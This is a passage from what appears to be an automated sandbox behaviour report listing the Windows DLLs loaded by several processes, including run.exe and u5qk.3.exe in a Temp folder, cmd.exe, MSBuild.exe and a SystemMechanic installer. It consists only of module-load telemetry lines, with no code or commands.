Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: riched20.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: usp10.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: msls31.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: dbghelp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: pla.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: pdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: tdh.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: cabinet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: wevtapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: linkinfo.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: ntshrui.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: cscapi.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: wsock32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: winmm.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: wtsapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: wininet.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: winsta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: propsys.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: security.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: secur32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: olepro32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: netapi32.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: samcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: wkscli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: srvcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: netutils.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: schedcli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: logoncli.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: msxml6.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: textshaping.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: idndl.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: iertutil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: bitsproxy.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: textinputframework.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: coreuicomponents.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: ntmarta.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: coremessaging.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: wintypes.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: dwmapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: napinsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: pnrpnsp.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: wshbth.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: nlaapi.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: winrnr.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: edputil.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: urlmon.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: windows.staterepositoryps.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: appresolver.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: bcp47langs.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: slc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: sppc.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: onecorecommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: onecoreuapcommonproxystub.dll	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\u5qk.3.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: uxtheme.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: windows.storage.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wldp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: profapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: mswsock.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: userenv.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: secur32.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: sspicli.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: wbemcomn.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: amsi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: iphlpapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dnsapi.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: dhcpcsvc.dll
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: msimg32.dll
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: oledlg.dll
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: oleacc.dll
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: wininet.dll
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: netapi32.dll
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: samcli.dll
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: riched20.dll
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: usp10.dll
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: msls31.dll
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: dbghelp.dll
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: pla.dll
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: pdh.dll
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: tdh.dll
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: cabinet.dll
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: wevtapi.dll
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\u5qk.2\run.exe	Section loaded: winhttp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: winbrand.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: wldp.dll
Source: C:\Windows\SysWOW64\cmd.exe	Section loaded: shdocvw.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: mscoree.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: cryptsp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rsaenh.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: cryptbase.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dwrite.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: msvcp140_clr0400.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: profapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: windowscodecs.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: amsi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dwmapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3d9.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3d10warp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: powrprof.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: umpdc.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: textshaping.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dataexchange.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3d11.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dcomp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dxgi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: twinapi.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: resourcepolicyclient.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dxcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: msctfui.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: uiautomationcore.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winmm.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: d3dcompiler_47.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: mswsock.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: iphlpapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dnsapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: dhcpcsvc.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winnsi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wbemcomn.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: napinsp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: pnrpnsp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: wshbth.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: nlaapi.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winrnr.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rasapi32.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rasman.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rtutils.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: rasadhlp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: fwpuclnt.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: secur32.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: schannel.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: mskeyprotect.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: ncryptsslp.dll
Source: C:\Users\user\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe	Section loaded: msasn1.dll
